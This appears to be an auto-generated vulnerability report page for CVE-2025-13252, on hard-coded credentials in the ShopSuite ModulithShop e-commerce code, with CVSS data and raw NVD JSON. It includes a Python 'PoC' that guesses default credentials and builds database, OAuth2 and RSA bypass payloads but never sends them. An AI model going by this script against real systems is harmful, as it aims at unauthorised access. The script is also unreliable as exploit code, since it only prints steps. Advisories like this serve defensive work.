Security Vulnerability Report
中文
CVE-2025-13252 CVSS 7.3 HIGH

CVE-2025-13252

Published: 2025-11-16 23:15:43
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability was found in shsuishang ShopSuite ModulithShop up to 45a99398cec3b7ad7ff9383694f0b53339f2d35a. Affected by this issue is some unknown functionality of the component RSA/OAuth2/Database. The manipulation results in hard-coded credentials. The attack can be executed remotely. The exploit has been made public and could be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

shsuishang ShopSuite ModulithShop <= 45a99398cec3b7ad7ff9383694f0b53339f2d35a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13252 PoC - Hard-coded Credentials Exploitation # Target: shsuishang ShopSuite ModulithShop # Vulnerability: Hard-coded credentials in RSA/OAuth2/Database component import requests import base64 import json # Configuration TARGET_URL = "http://target-server.com" # The hard-coded credentials would typically be found in source code HARDCODED_DB_USER = "admin" HARDCODED_DB_PASS = "admin123" # Example hardcoded credential def exploit_hardcoded_credentials(): """ Exploitation steps: 1. Find exposed hardcoded credentials in source code 2. Use credentials to access database directly 3. Bypass OAuth2 authentication """ print("[*] CVE-2025-13252 Exploitation") print("[*] Target: " + TARGET_URL) # Method 1: Database direct access using hardcoded credentials print("\n[1] Attempting database access with hardcoded credentials...") db_payload = { "username": HARDCODED_DB_USER, "password": HARDCODED_DB_PASS, "query": "SELECT * FROM users" } # Method 2: OAuth2 bypass print("\n[2] Attempting OAuth2 bypass...") oauth_payload = { "client_id": "hardcoded_client_id", "client_secret": "hardcoded_client_secret", "grant_type": "client_credentials" } # Method 3: RSA authentication bypass print("\n[3] Attempting RSA authentication bypass...") rsa_payload = { "username": HARDCODED_DB_USER, "rsa_public_key": "MIIBIjANBgkqhki...", "signature": "" } print("\n[!] Note: Actual exploitation requires finding the hardcoded credentials") print("[!] Check GitHub: github.com/shsuishang/modulithshop") print("[!] Reference: github.com/shsuishang/modulithshop/issues/2") if __name__ == "__main__": exploit_hardcoded_credentials()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13252", "sourceIdentifier": "[email protected]", "published": "2025-11-16T23:15:43.173", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in shsuishang ShopSuite ModulithShop up to 45a99398cec3b7ad7ff9383694f0b53339f2d35a. Affected by this issue is some unknown functionality of the component RSA/OAuth2/Database. The manipulation results in hard-coded credentials. The attack can be executed remotely. The exploit has been made public and could be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-259"}, {"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://github.com/shsuishang/modulithshop/issues/2", "source": "[email protected]"}, {"url": "https://github.com/shsuishang/modulithshop/issues/2#issue-3580272472", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.332587", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.332587", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.687685", "source": "[email protected]"}]}}